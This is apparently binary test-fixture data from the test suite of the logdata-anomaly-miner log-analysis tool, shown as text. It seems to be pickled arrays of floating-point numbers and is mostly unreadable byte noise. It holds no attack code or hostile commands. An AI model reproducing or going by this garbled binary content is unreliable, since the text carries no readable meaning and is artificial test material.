'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-/()[]{}!$%&=G?LGP+tG?+%G?FWfG?!zm>G?Y0G?.ɨG?e$"G?fٶ#G?n\G?L]G?b~G?jV=G?OmEG?:0 G?煃؃G?F8G?v3$G?^5ȃG?< G?(G?G?}}dG?+NT:G?̿FiG? j*G?-O(G?T-G?k.AG?sp G?X(G?)8n8lG?G?"۝,G?V幒G?}*,Ƹ-G?{: G?&$G?TG?K$$d%G?SquG?U0 G?mP#"G?؁>/G?}?uG?ӜSG?eu2G?6t[G?fAG?ĜHG?G?(~zeG?ap'G?ӕpG?^4G?SG?:2x*G?ӮL G?쎐"G?]kG?7RG? G?xG? "`}G?럖?OG?LDMG?(WG?MfG?>-HVG?G?ٶR.<=G?>|MG?ﲜ'G?/MԻG?XRkG?!١rG?azvG?_q G?IxG?@rCG?[ogG??.PG?esdXG?G?ʇՏCUG?š,yG?^!9G?w#r G?"2G?҂s'IG?"qG?r?G?XAG?vEG?D dG?cVVG?#qG?4VG?~cG?cATG?P)+G?k"UG?m~U<0G?UBG?jGM G?zD7G?E( BG?G(LG?_٧G?@ZG?ÊD@nG?}UH'G?K 4ӏG?a}~|G?Ҭp%^G?cj<LJG?FG?س+]fG?YQPG?:G? 3G?= 6@G?LG?Lo`aG?VהG?(KG?_:x晴G?ָ*_ G?^ɮzCG?*sG?B~G? LAG?~>yG?ÍyyG?vHSS^G?vt1G?R3G?AkW~G?%G?˾+' %?G?4G?)WzG?[sdG?oxQ"G?Y,G?7xW G?!B3]G?9rbvG?9,G?ʧG?޻ZFG?,Q*G?noG?^ 9w$G?TVG?^^G?t/M0MdG?KQꟊG?Ϻ;0 G?y5FG?Ɣ1"!G?G?ksG?ꆺG?Q5!G?ׇY CG?pUG?29{'>G?2i G? .c[RG?x0G%G?ڈ&ICG?#G?=fsjG?\z)G?ê.G?]￵vG?./xG?_G?pHG?G?f|G?G?cwG?ꎟr)BG?MdG?{LUrG?ѧ G?C"G?"4nG?VdG?Ú YG?S;P(G?⤬G?WVQG?1%IG?4j{G?a+/G?[=G?QGG?+ 6G?J%G?U.M7G?y'KG?˼n TG?ܓG?.G?Ñ~NG?; VG?᮵߹G?o4G>`qG?'՝wG?*EG?emItG?SG?-YG?JG?=5eG?nY-IG?LMG?Mb@ȍG?tG?msG?2G?ٽYNG?mFO9G?@ ޱG?ЭG?5G?5p\G?̔G?L2G?d0N\G?s ӳG?#ʑG?rsG?ɛ뾊?G?z)G?dQG?ȄgG?=H 5G?ESЄG?CsG?fdaG?׊MʥG?ڱ“G?S;G?׸FG?J~*. G?]ċ"G?ųB}TG?ͪ+XG?EhwG?哇+Y#G?X.kGG?{1G?놊HWG?-ۃG?+-aWG?2NgG?R~e G?>RzG?{G?ØlKqG?EG?PөsG?ИG?젱XˠG?йqkG?:pArG?%yG? &G?ٷ%Lm G?dX JzG?y:SG?qi)G?V`02G?0lG?N-JG?„}&G?q&G?ځ9θG?H2 G??]G?<6 23G?1ݬ:G??>lG?眻wG?z>ˠ(G?μG?ӊG? pY zG?bԂG?T6cenG?zJG?0nwG?gdCG?1ʟ"G?W[]ǠG?FG?Եr8).G?24G?cjG?\rLM!G?`lXG?KƜG?c!BG?{EG?-<%ZG?YuiG?G?Qǣ|G?}RG[G?EoTsG?KH"G?`G?AX:G?x}>G?G?ǻyQG?DAhG?P]BCG?6G?G?0G?qbsyG?%G?ڮG?L_(SG?N>G?ӘG?rg1dG?䐅G?JG?u$k(G?.G?= -qG?pj{^G?ոxG?DTG?2fTG? zOG?Mش@G?獧W'G?ﺟH0dG?~.wxG?ߧ](G? G?˶G?bG?LEG?_RsG?йdՉ+G?J:v7G?ÐG?` ҃G?U?G?G?fgnG?G?I4[G?n0G?9p?G?&KG?ASG?VL0_LG?E=G?yn G? hG?K G?ҶFEG?N6G?㑀ۅG?NG2G?M#{G?bȻ$G?ѓԮ G?'Q?G?:jdG?fH#CUG?TҥRG?!@vG?#wG?SSdG?f G?JG?`܄G?Op2ZQG?EbK G?G?V=G?0C{G?uON-G?ӈY9G?P?#G? O_asG?bG?9pG?!rjrG?`2G?; (G?8>A]G?eفG?ƫص|G?VcxG?MG?U3=G?ݜ[G?jG?`,G?RnG? [G?K/G?z A\G?QG?)}G?`:G?ͶeLG?!G?xXD\G?S^tG?;G3`G?d%;ZG?SMG?NrG?v4@G? G?p&G?1_G?+[uG?b,G?tZOG?FG?lʗG?"cjG?g8暥G?=d3G?p֌G?EUG?䇂G?ݬG?精T>c*G?h@9G?#ɑG?ہwG?~,Qt5G?-yAG?,e8|uG?=fNG?:G?*G?-&G?huq@G?rG?fG?6O7G?ptG?tlsG?`@Ye~G?:`G?z)LG?SG?_=G?fV G?X~9 G?fTK?G?D/pG?#$G?v} G?'j:(G?U\NG?jCyG?-5G?N.nG?5G?^m%нG>m*FG?l(pG?%G?c'G?DTbG?XG?-rcG?B2xTG?9NG?d7:G?TCG?M nG?0BlG? G?7'Oe(G?%@́G?}\" G?+eG?4w7]qG?G?.mG?QݡG?cG?,0G?ԝRG?邩WꅑG?zYmG?U?B;rG?&K7G?VY.*G?[?}G?#ayG?ΆЧU:G?$nG?fx/G?="G??w!G?0rw.=G?'G?G?1dG?Ǘ^VG?\!G.G?b=&G?*EG?B"TG?.8%G?xsG? m G?+*oG?}~QG?":+G?Te/G?*>3u_G?cl4G?'G?u G?$ G? x?G? 3G?&K>G?C 湫G?Z_G?㟭Ĉ)G?eÚGG?˚QG? G?!#ЁG?WIG?XɽإG?ǁ}G?ﵭG?/G?侕K G?lqG?xBG?G?{ G?i)<G?ږo9G?{ G? lG?ݩ8xI4G?NcVۭG?݅3AhG?LlG?tG?Q𐆚 G?.wl0G?|%.G?&A+G?_: G?F]0G?[!G?;~^9G?kOG?'7j0G?F;ZG?ޓ鞋G?ֻ*W G?)M RG?喜l)G?׆ 7ZG?ymG?YG??ՃG?G//jG?ÊWg+G?߹&G?>~CG?-IIG?{paG?ZGH(G?G?꺜(G?nG?'oG?\{&G?ᄼGeG?ѱJ(9cG?KBsG>؉1G?r!G?<G?M/gG>⳥r\G?\rG?M|G?iT8G?uz]G?咜cG?TW*OG?96G?!+G?6xEG?-VG?X]`G?[S&G? ,G?a:G?െ"G?]OG?8ԟG?mnG?V y 4G?ᄾLׯ-G? G?ؤە{G?r; G?Rk;j7G?A 0G?#9AG??FFG?ʔ!B7 @G? cNVG?H._G?k* XEG?7-iG?h3EiRG?]XG? GG?[G?W?G?T G?1ԅPG?҄G?L냌G?}ۥ,G? >G?\CG?~öG?}XG?阘OG?:G?om 8G?:MOG?"EVG?'G?;XG?$@XG?$UG?j]G?x0µG?9WlG?iN$G?2(G?.|G?|~3G?ˈYqKG?rt٪G?ӽpQyG?›'7G?;G?G?(G??G?ޘ*G?˘O~!&G?ԝVG?.ka6G?5{@G?fxG?͔ouG?݉v)G?ҹ'!G?lSFN G?'5G?RDG?G?qDnJG?}G?ݓoG?r'ퟺG?ةԱG?VmF@G?Dyv-RAG? G?bIJG?EG?3G?{B/ӔG?ܦQ^G?M*ږ\G?V8G?:ɕ\ G?h`a4G?2DQ,G?IUaNYG?}TG?4AYG?|_nG?` G?0CvG?TG?ڑ~G?G? ꅮXUG?ӕ@tB$G?Z BG?|mKvG?tJ G?W;G?Reґ:G?Kף)%G?Sb\tG?Q6ޞ8G?a@/G?eG?!+G?^6)G?Qu$iG?Tx G?T5\G? y)G?~/G?mL`dG?vG?[ 舦8G?SBMXG?db|G?L VIG?cߟG?=_G?1SG?penG?ٗ wG?v1G?G?AG?t |ӓG?kSG?.j\JG?@*G?iฤ"G?hv4G?pG?.EBG?0`B}G?D~(G?vG? ŧ@G?wȽG?RTgG?cDQG?YV G?X)G?wn^4=G?±naeG?S zG?㎏CQG?ٸG?)~،G?{[G?G??ۙG?Sd7G?֌[G?桖zcG?р*ڢDG?fG?,ᕀG?klG?>GC}G?NBDG?AC 8G?‹92G?M G?~~mbKG? gG?G?VgL~G?U RG?G?G?D^4ٷ4G?ذڄG?~S2¡G?u]G?­G?`':G?kΆ{G?Ei.G?˦WnN"G?dG?̷)z3G?.N*fG?U5ܾG?]KG?/No/G?:lG?lAȫG?CVG?a]G?\!G?+6oG?\~޾SG?OXG?|1gG?av G?]G?›G? dG?G?Nx3!G?UKIG?UO G?ӂhV:G?6 {G?YLTG?sG?إ_!G?( ڼG?@O2G?aLG?y,bG?7G?hG?qQC5G?5G?]_-*G?_5G?NLlrG?B&G?ϙGG?WշwG?1~G?#3]G?&7Vc~G?pcҲG?-6VifG?͢G?}jp6G?̚>'G?bjzG?뒳G?Gj^G?߀G?уG?⫻)G?斄['G?.G?\m 0G?pñiG?pydG?ҪG?O{G?ȱBIG?*G?˅ѐG?vzG?ꠏXG?_G?c;)"YG? łvG?o+[b(G? ?G?p:9G?%U֨G?ܯ>G? UG?G G+1G?0fG?+LkG?Y@HqG? ^jG?쾠 LG?`@G?AG?Tn G?)(G?Ʋ5M`G? ^T G? MEG?oW/:G?eSG?2tKΓG?ҨhG?+pw1G?2s iG? G?ɟZEG?txJ\`G?8,@G?1G?$vG?t}"G?ъXE+G?=Ǥ G?q3vG?$J:G?޶kG?UG?古eG? 1OS@G?G?~2 oG?h+G?yG?]G?G?ŜMG?b3G?Miӧ0YG?GU\G?ݶLVG?a|YG?yHG?Ј( $G?U G?orjG?b>6UG?fFZG?o\ԓG?^ kG?k"G?=L"߻G?=MG?Ϙ<]G?a7G?EoG?k5G?: G?_B:`G?(A G?x>^}G?}G?nnG?CG?~G?ҧJjsG?]6G?=GG?{t2rG?B7 WG?M/ZbuG?\tG?G? G?3QׯȮG?cFG?ȡzG?-,YG?T)nG?CdRrG?UG?N+G?|2.^ G??G?LhG?ԐӦ G?.xG?+uiG?k7G?ˬ?nDG?#G?[_)>G?i&G?>Dd:G?(W&G?{O X۹G?ﹰ!?{G?0(\G?n,[icG?y )=G?М@l|G?f#:z+G?3%{aG?HIZ.G?}8 G?v*nG?lyfaG? e@G?a"G?z(NG?,O)G?ڂ9<G?8kVG?:j⃕G?SfpYG?֤F1G?.UUG?O7~G?x? G?/=NQG?B_G?4}mG?PWG?쭴/G?"ti^G?CwG?aK~G?aG?(H"zEG? ޶G?(ZG?NJG?CQG?і\.G?)-ZG?'ZnPG? J?G?!٦G?136fG?T4?G?_9G?hM3G?~,XG?^ݹG?>0G?XӟR#G?[G?Ri8G?0IG?ԃG?)G?R2G?¤_%G?؊pbG?p?DmG?, xG?&'sG?:!G?G?G?yG?ԽnGG?W G?0p-G?,D0G?}G?*RGG?C%jnNG?ߞ{nuG?S̉iUnG?q7G?bHG?ď&G?MG?M3G?GG?p{bzG?"6G?(tG?fG?ںw Y$hG?I9G?Z5G?G?h#evG?Ug*UG?薈1s=G?EMG?m}G?ǣYfG?G?ρH~zQG?쓔v9G?G?uɝRG? 2)G?#rੈwG? ؾ=G?' cZG?PG?́:QNG?}\G?q7fG?r`+G?G?I%G?,81G?Rx}~(G?<G?h_`G?")JG?aBG?%&eEG?նZ6G?c+4}G?Ib7G?󺰇G?1 bG?2G?$z-*G?SE G?Q˭G?3yG?][FG?*5LG?Ӱ6i5VG?ysG?DG?؁w,qG?ݻԝ|NG?F:G? ȕG?yJn_G?WG?꿣T|G?qc?G?;iq/G?G?ͤ,bG?b _G?sꇨG?ꡍqG?ARG?&wG?nQ`G?ȤHG?Խ&EG?G? 6zSG?ݛ}7?Rhh Cj?Rhh C?Rhh Co;?Rhh C(9J?Rhh C[Zn?Rhh Cr*=2A_`?Rhh C\4?Rhh Cמ*?Rhh C t?Rhh C(?Rhh C;Jz+ ?Rhh CW4~?Rhh Cb1?Rhh CP9?Rhh C/ K?Rhh CDDd?Rhh CXx?Rhh C&A>Z0o?Rhh C;%?Rhh C _?Rhh C :}?Rhh CS{?Rhh CBn?Rhh C.?Rhh CfR?Rhh CJ?Rhh C^d?Rhh Ci[?Rhh C4'8?Rhh Cmj1?Rhh Cd0XQg?Rhh C ܍8?Rhh Cc?Rhh Cma?Rhh C2!}?Rhh CcS?Rhh C ~N?Rhh Cn%p?Rhh C5,a?Rhh Cl >e?Rhh C0_~?Rhh C?$uE0?Rhh C!?Rhh CEFV?Rhh Cq_=H?Rhh CY:~e?Rhh C&F{1?Rhh C3?Rhh Cߏ1RI?Rhh C&DB?Rhh C+n{?Rhh C|2?Rhh Cm%?Rhh C>վ1?Rhh Ce.?Rhh CHf?Rhh Cc㌙?Rhh Cxɖ?Rhh C4b?Rhh CDn j+?Rhh CQTU?Rhh C~s#?Rhh CAcj+?Rhh CZ􁯄?Rhh C++0?Rhh C(aX?Rhh CvŮV8?Rhh C ,5?Rhh Cш?Re.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta1_data_test7000066400000000000000000000647021500476301700275260ustar00rootroot00000000000000i](](G?ӘXKG?|G?wG?jW G?z|yG>G?yG?8hn\G?^ְ̉KG? 깸G?M G?vGDG?\vQG?_eHyG?ɥ,G?@G?N-pG?wgCG?k:G?.aG?t tG?+)NG?ڙhG?ݍa5G?t0OG?>/kUG?Æ3G?s_G?AcG?Җ rG?ոb1G?T]/hjG?Ɉ+G?ۄ0K r!G?̦7sEG?N'NG?VvmG?A[wnDG?QF6|G?eoG?ulf%G?G?*jOG?\NZ9G?NG?rxG?f?GG?0F}DG?bG?ZOG?]tDsG? )dG?>BG?4vG?ߣ-G?~݅G?oD]+%G?3GaqG?BˮxG?jRG?oG?1>j`G?C=LG?!G?hJ -G?|G?} ӥG?G?RG?*G]SG?Ң$G?3G?{Yr>&G?!OG?wKԢG?@aG?}sG?ŇZG?ݿ0G?8x G?(x+G?G?7mG?؏G?v~G?O;΂G?;H-G?U7U=G?_[&G?'GG?c@IG?`5GG?^CGOG? HOWG?rjG?T\G?d1dG?g1zFG?I"(H8G? &G?!}-G?ٙZ1\G?q G?PZG?wGCG?+>lG?M>G?eIBG?Jsc-G?!G?nuG?j?H:WG?w'=G?/G?4m;G?aCލsG?ՐxG?\) W G?1\:1rG?*$IG?2zTaG?hn"G>6DuKrG?ދÉG?.>TG?D)7zG?oG?/w`G?nG?a]WG?d72G?ܳѿkG?1n)G?;(rG?[.Ŋ1G?(`XG?אG?(^G?NF#PG?>ISG? d_G?RgLG?P`yG?9"G?K']FG?G?G?~MG?эG?#t0G?èbG?<+/G?=f0G?G?4ks7 wG?̅ G?3WG?wɀG?%Q{G?\&G?O9:nG?9;D'm)G?ƻκZ=4G?ޅhSG?hG?!/bG?Z{vG?lG?GBnLMG?+WJG?}uTG?oCC.G?S_/G?&UPhG?mCKG?9/'G?\xRG?`G?۫G?΁ԏG?1lG?R(0LG?G?%G?r\\1G?vە+G?_)+cG?k)%dG?4ڌIG? ?G?6)~G?2CG?fp,G?&WG?u-تG?& #g:G?h]k_G?r+6oG?S$zG?8B3.G?*G?JkG?H^}75G?tVJ y3|G?-0^!G?ҕAG?(BG?*o^G?ǵDG?vTLG?$G?'G?33G?-dG?#ING?{xG??$kwG?_[A$G?+YJG?_ G?~G?̕{U&G?&D8G? 5~)kG?Vc+G?ՅrG? G?ܦ=G?͒Ɨ8G?κ-G?̖ G?nPAG?xa.)G?5)6G?3HG?t^kG?qJkG?BtgG?Ƙ G?w>]G?/#"G?w-5 G?#gOG?e=YdG?ň*j|G?̣G?O#jG?H=G?yG?/G?hG?HUjG?0;G?5G?6i>G?pFG?5f G? .qG?iG?fmG?YG?7EG?.cG?1]-uG?CWPG?J3jG?DOG?J-xG?eٝG?46G? ;~wG?@JG?G)!6G?uP踋G?x=:bG?b#G?`NRG?rG?XhsLG?E5G?ų0G?țG?ɒrG?@{"!G?ӑ;G?"G?wG??U?&=G?wG? )OG?0@G?Һ9L :G?nyG?-`BG?=#T*G?dG?n1mG?ڶ'G?-Q`G?7HuG?"G?񳌉;G?iG?#qG?ɞvG?읳{^G?n`UG?K G?1FG?yG?+5G?HOmG?WRٛ:G?FeG?\QG?e: G?V EG?.[y$G?ESG?M=:G?-j G?ߥj`G? (4G?͢89q'G?bG?Ʒ5pG? O0G?G?nzG?eG?=-G?l1G?ֳ"leG? =\QG?ϙtG?UWDG?; jG?єH>,G?o̵G?c IaG?}vG>QoٹG??ݱG?ul_G?#gG?ta՛G?sfG?JZG?fatԞG?uCsl֤G?Ѣ5 G?JJG?kġk%qG? @G?D}q:G?B/G?ֹG?JJG?F;UfG?ק8G?]G XwG?ˎKG?q G?mG?\wL8G?' mI-G?EG?uNG?;NӸG?YG?T {hG?zFqG?MG?ҝ&U]G?ze`aG?G?N4XgG?wG?ǐG?DG?³G?QJvS2G?۟*G?G G?u=L(G?5{G?Akm`fG?BÕ;IG?&nG?OwWqG?^/ G?~ *{7G?{G?O5G?Q˱.RG?߰BMG?/OsG?z>hG?xЦG?eG?7vG?L G?@ZG?xx)G?Yb&MG? ,NG?jWG?g#kRG?ΌswG?G?X:tG?++#G?[/DG?djG?tG?§ŏG?[ G?6.^^G?;G?ýUQ,G?呾G? `?5G?G?G?ݨFo.sG?XFG?3:G?Bjkv;G?(F:G?_ٗcکG?ԫނVG?=K{yG?Eikd G?IG?,kG?22'WVG?(iG?P[Z\G?VjsG?P"G?Øhl G?ʸbbG?:CG?%֌G?|):G?0G?΄ҋ~G?sAiG?X@JG?A=^KjcG?ʓ]lG?X<"G?p)FG?/qopG?!tYG?^wqG?I׍ƇG?J G?a:FG?b G?`>G?\JG?ɣ%ڠG?Ӆ04zG?ϗy“G?SV&G?,ҚG?K+G?6R G?nG?6NG?ﭏgG?M|0NG?S++G?41eG?htnHG?u` G?5sG?[~u G?#dŘG?FvG?a+ NG?G?+M%cG?#G?97vG?=[ \G?!G?a,G?:oZG?4dտG? ?;0p;G?du`G?\D}G?/1KG?v5G?;*{G?ՔᆉG?3hmG?FLG?4fEG?<_}G?kG?ٙG?Vg)G?k&77G?^B*G?%^G?ٖw%G?s'9(G?@G?i25G?탱qZG?nGk rG?G?G?礶^y~G?#̺G?䝺rG?j G?BYUG?}{G?y1-G?~ۋ G?2#G?bBG?AzG?v pG?*G?ƌjȉ:G?ӳ\G?ƥ,G?XaG?X XG?߻G?۔" G?>;G?仴K~$G?ٍ0VqG?e:LG?G?ﻻG?H7aeG?KTG?Pj/G?쪎G??G?sm+G?GG>w5G?$S/^G?SGG?ZG?J G?ZIG?)cG?5!MG?ƌG?LCHG?vG?^R:G?YMG?o瀾G?鶞^hVG? ~G?ً G?*V|G?΀G?],UG?j!UzG? ]G?2bśG?G?bיG?*~fG?*G?/ _G?{IG?qڙgG?H\դG?;{QDG?i1XG?7 [G?^G?,߫G?S˅G?RRyG?R@BG?lGЉG?ȧ(G?3a>G?؇wƕG?'$_G?G?G?1{ 2G?V_G?RBG?epG?1>s*G>˗8 8G?-zG? 2G?<1]:G?a G?3Jh~G?,빩G?&G?^[G?'tWD7G?ʍJ|'G?RWOG?М1{G?VKG?KpЄ>G?)}-)G?JLbG?#ԫG? EPG?b:G?wu(ZG?G'KG?Ji{G?)G?-r G?z<=eG?&23G?d ,/G?=ItG?XeMzG?vҳaG?`XVG?ȄJG?r@/G?̙xG?qvx]G?a/+G?o G?͢3JG?;,G?vsG?mݦG?\t6G?.d G?n#|3G?Y_hG?b[G?n(?AcG?TU<_G?9JG?q kG?G?ӎG?>P"G?wYA@)sG? +G?/CG?O@q]G?$"G?iRyG?ԅeG?&(fG?,ctG?`存G?㪨G?]]t=|G?SAG?ʔJ|G?6G?ZfkG?2QG?s0`G?%T(>1G?kF@G?c/3G?29 G?6w'G?P"ŸG?JBÚG?ұG?y6G?h+X3G?} G?ݚ zbG?8cG?|%9G?sh#G?LF3G?%0e(G?FVLzMG?g`BuG?9G?:iG?NAG?&G?ٟd@"NG?! 2G?ś'G?4㝕G?BD0QG?܉G?aM)G?g&a}G?ԭ wG?yB5G?j^[G?U#G?6G?堽nG?N{4(G?W"?iAG?~ G?* AG?CFMG?I;! G?t4G?#~.G?5G?|\ChG?l8%,G?(HxsG?y9WG?oG?}톐)G?ޮН=G?.E+G?}tG?;NG?+Q G?6G?s/3G?덮%_G?ZڜG?(찙G?`dG?)"imG?}&x.G?v`,cG?)$%cG?kc!G? JG?+.U`gG?#չG??=G?cWG?љ _UG?C\G?Շ#oG?횉C0G?S?x)G?QPG?N6tG?ġj'6TG?'҄DG?7fcG?<ρC9G?2r QG? +G?lnvG?;m5G? `G?G?{G?S 4`G?gBG?gKG?ksG?V=#fG?袌4FG?xhOG?aG? Cط G?VG?G?ԡh~G?hZrG?~_hG?"G?f/ G?Ŭ#G? G?gTG?zG?iۗlG?l㗎G?V8)]1G?S5TG?DoaKG?jL%G?r8G?Ȁ6-XG?F@5!GG?6{pxG?ʱ|3G?G?γ)룿FG?u&G?~9jG? *}G??G?OgG?6G?!G?+ `G?CG?QG?4ZGDG?1&ݓG?&FG?G?)Q@UG?v1Q@G?G?ЪIG?<HG?.nQG?”AIG? ?ĶG?לG?+NG?Ʉ&_G?˗MG?vr*G?2G?/I%.G?S8 G?/B޾G?Z qG?nSG?!?SG?Զ/KG?V)zG?1݇ G?q|SG?LuK;HG?jTG?B5 VG?ꉾ$ G?F{0G?c^G?@kv-G?4gknG?۠RQG? ޡ G?GpרMG?IhG?3 4G?s .h `G?$7G?t G?ϯnG? G?_p:G?pG?cZG?R5#G?홦/uG?n:?G?~' G?WJG?߅IiG?f G?lEQG?dEOG?|#yG?w6G?ݿugG? KgH G?2]i4G?#y5G?h7G?u@wyG?d `G? lG?[pG?cG?PGG?LPG?̆G?FDLG?돮G?Fѫ.G?SlǧG?"f!G?fX*VG?G?axG?ҙhDG?}F^G?hG?,1uG?g1qG?zh1G? G?QaXG?'G?js~¶G?. }nG?'G?MBSG?ZiG?G?)!?߽G?6G? G?C/G?Е G?I!KlG?~G>ODZ_G?5\?/>G?wT]f;G?OG?:AG?[KkG?J72G?o.sG?2qzG?hO8XG?N=\G?͔>JG?ւBG?TQ*G?^sӜWG?VkһG?4rR޽G?駺iG?5h.G?vGG?lh2G?PxG?ဉ'l=G?8G?e$G?z(iG?Lt-G?GjtG>wG?S"D%G?G??@~G?ՖNG?T-G?{ܬJWG?kvG?P$,G?;܂G?wq%G?cZ9nG?6rG?C:G?Wz6`aG?fy$G?魠jCG?QT%OG?OU,G?s"3W-G?m!3UG?7 G?]殗G?y9d G?о},bAG?E vhG?ꇊN\G?-crG?Aլ)KG?2c%MG?yioGG?qUk.G?喝nG?Ks8TG?ٷ%>"G?vOG?>G?O"WkG?c -'`eG? \!eG?￉V/G? ,rG?ٍ~CG?s#G?]N>G? q*~#G?HZ&/G?u o@CG?)nWG?NAn3NG?!xG?e]G?w,9zG?ŷwG?,hG?EխG?G?wc G?@G?Е@LG?#G?nF G?'>5G?佥'vG? o^G?:S6G?o\UG?0 4G?!m5rG?`GG?3رG?CG?킨CG?,1rSG?_iG??-G?~pG?IJG?(6G? G?mxG?& G?FG?˃&FG?{.-~G?Z=3XG?TO$zyG?#q.PG?tzjEG?oW*3G?RpG?`}]vG?@G?(:AR G?Gj5G? suG? X7G?(G?}`3G?>;G?VZɎlG?UG?5cgG?qw4eG?x4vG?TxzG?2pG?!?,buG?q fG?(}eG?pG?na$G?-8RIG?oCG?Zz2G?>`G?"FG?e"MG?jG?p}G?@޼G?P G?ѻ˼G?;盗G?)jҦG?XZ>G?iG?A媅G?ھ.dG?G^8G?MjUG?춼oG?q=%vG?WjG?ّFvG?KfьG?eh1G?P_G?@G?:;G?"F(+G?RG?r6xUG?S";3G?qG?'G?֍]AOG?[8)G?]]GG?aK&G?8hMLeG?}_G?.VךG?СG?5G? 88hG?aG?ƻǦG?yG?yG?G?լDG?MuY\G?p<%eqG?#oٓ5?G?C^>:G?ٝ3tG?v@;G?PX"G?۽ pqG?cCsG?xOz%G?(ܻ?:G??G?G??Y21G?R2G?/G?WXͳ9G?{JoG? < G?TH35gG?-G?ˮjG?%Q`G?얫tG?A tG?Ңޥ/G?+QuG??iCG?ϖG?ԻG?沒8ЁG?E"G?xCG?D$wG?gG?cYOG?^0a:G?w%t"G?M;OG?ϿvG?VG?ɔ)G?,[ bG?˔pCG?悛=ĉG?[ݐtG?ZRG?#$G?X9G?V):G?@}(G?7 eG?IEG?sBLG?SyG?DG?Ŝ0aG?]G? >G?@KW+bG?2wvG? =G?U$ G?ژWՋG?(G?? {uG?A'G?zkqzNG?mȡG?a'urG?YG?~}LG?ͱ`ͻ\G?Æ.G? fq0G?colG?WG?JG?G?8|G?VO;LG?2J~G?M/Z/G?QmG?⾘)BG?**'"G?_4fηG?ޮU%2`G?Ʊl?vG?]$p G?XyRG?h$hG?jCwU-IG?킽oSG?ڥNMƚG?cG?<6A80G? R3}G?녂G?j`avG?ھgGG?ޫ KzG?=G?ǵ;'G? G?{̈́iG?$G?Tg#yG?EG?v~BG?k`G?S Q$G?:]G?vd6;G?/MG?G?y2ɵG?\TG?ZG?Qɼ)G?iG?bG?ȶG?X:qwG?FΔG?P.qG?(cG?ݾe2G?ҳG?#>G?VC{G?Dĩ@+G?[>G?& OG? .G?p{G?۬mhNG?4$;[G?ڐNЪŽG?ǔG?<3G?l G?F^G?2,G?G?.Zk~G?y4سG?*G?>1S5jG?EaG?jj7e?lG?L@G?^G?* G?Z(G?43ROG?z4aG?/=hG?xq(F~G? $G?_mIdIG?|G?+xG?Ԩb|G?Z 2PG?O5G?jG?$f 3G?-G?ӉǓ$G?T,G?dkG?q@M3G?hL\sG??{W3G?T eUG?޺+㯮G?$!_wwG??z,LG?ggG?ЮJG?8nG?hh0G? 9 G?ogOG?UuG?@zG?COG?Mvq87G?ZIG?Xj= G?"oG? 8IG?2P[pG?V'G?VG=G?^G?gnCG?.mޒ9G?֞G?~G?aBG?;,!G?*#OkG?9E(G?O4G?pfG?8x # 'G?鰹FG?4kG?'*'G?G?]*cG?GxeLG?<#G?m\9G?)!K)G?$G?|M'G?ЁG?ϨZ[TG?; tG?-MS6G?W2RT3G?gG?|S[G? G?͹-G?{W}G?(`G?bjcFG?쉼G?r3+G?-}%G?ꈂEvG?_Wq`G?w'ZlG?'?ĿwG? Bs^G?5G?Ӫ1G?.{sG?"R=iz?G?oO{x_G?3XΜG?ޗ-yG?#1i_G?j46G??"jG?:҅G?@eXLG?~xG?hŖ୭G?ۑ qG?ހG??MG?hAG?쉽q:G?̾ EG?"{G?߳nG?*G?o5oG?OEmG?>JG?U^~UG?Z5G?tG?!=G?H_CG? <$G?F*G?v] G?KG?ΜTG?q=G?DcG?*qQ)G?G?솠`G?,ӿ@G?PΊG?,(G?\ נG?ם:j7G?5PA G?ǜG?t6G?~G?O l$G?ďiNwG?QW 9G?~}G?4ImG?$ۋG? wG?[jG?S6G?:'G?MeG?H'LG?2/G?& Jj]G?M/NG?QG?pG?O<~G?AZG?冋~G?ˤOeG?N G?۳3G?&`G?`9G?}Y&G?N'G?OcjG?g}!SvG?ƴ;G?bJG?0<+G?ᾺG?% G?o<#\G?la0G?}~SG?2ibHG?W~lG?ޱfh>uG?uC G?wju%G?-A^G?T}G?↛Dm6HG? WwG?fw&xG?GC0G?oG?tu1G?9TG?zOG?wna0G?G?3G?ƒG?Vڀ-G?<as|G?e,8G?ڄSG?Ar.G?ˁS(G?+rG?$ G?D G?W5HG?eG?U^G?Tu-ȎG?q]{W?0G?ZcG?2,+EwgG?tvG?/zG?]'G?z6XtWG?܍QWvG?x/QaG?Pa{G?똦:C$G?v(ZG?WG?ǭWG?KG?p%G?2P1srG?ܨ`{G?uG?aG?)^lG?!j:G?, ^G? wG?Ϛ:G?eEkQgG?\v!dG?SC~hjG?ҴPG?RG?m@NDG?S~G?FMW{G?ЄZHG?ʓDG?#@$G?ךrU|G?7G?G?c G?_ƀYG?d˸G?v2dG?L7_G?v_=G??,DG?׆T4G?Rpw G?TB|CG?ˮWnG?w%n#G?NN]EG?gG?lG?˸9sIG? 6(G?XG?MEG?lzG?gkK-G? FrG?܊G?sն&G?(|)-jG?kLG?ǎG?`wqG?JO3G?u`yG?DG?A߇G?ޓd:QUG?Ae@G?b@G?>0G?srG?QN1e](G?%>7G?ExG?yG?%(DG?v>.ooG?Gki]ѺG?3PYuG?R*3G?ȎG?=kNSG?o6QEG??G?Q)G?>~HG?պ4;#G?G?j G?dn(OG?s(G?dv/G?a g>G?ZgG?;2eG?_rG?26ϙG?BG?`F*zYG?q1&D3(G? ~G?1G?1ƉG?C@DG?iƑG?9qG??G?>~`Σ/G?MzG?jD G?DV0G?[|0G?2 5G?چ̒hG?j氰G?gMtG?ՐWXG?܏.G?/ ]G?ɺV@G?ЎwG?ݟrG?>eG?⩹}ՠG?aUG?PjG?:G?'J G?u1G?^ r^G?G?yG?0qAG?5!%6G?-G? (G?u&G?T$RVG?+^+:G?ͭl`=G?lG?IRG?ԾG?vќJG?ȿG?]G?yCoG?1>O*\G?ֈ2LG?ݕzR0OG?cY^qkNG?YG?)ucG?\I|G?ȅG?G?wG?t|jG?VJG?G?xgG?o`G?(G?TvhG?ҚwCG?K0G?+VWG?ܯXG?Rp G?̧4nG?G?|" G?.nܯG?ȅy؅G?tPs^G?\qO2G? tG?-@zG?0'G?Z*G?q8w?G?R lG?%VG??n",G? 2uMG?h}\G?[G?VQӦG?怿z=G?烈uG?PMG?G?^mΔG?#7G?:g_ G?ժk"G?LG?pyhG?@ tG?G?T AG?h8G?5xQG?ʑGG?偬G?qDG?($PG?د:G?Wp1G?򭫽+G?цG?l0ua}G?OG?a'aNG?&~yG?2GG?"G?s/PG?W)G?ƺ=G?G?ά=>G?T~G?M G?oueG?+G?TG?3s|G?ݿ=7?G?dG?̞G?G?sE(LG?e G?Y]G?x G?FqG?JHG?}3LG?0- 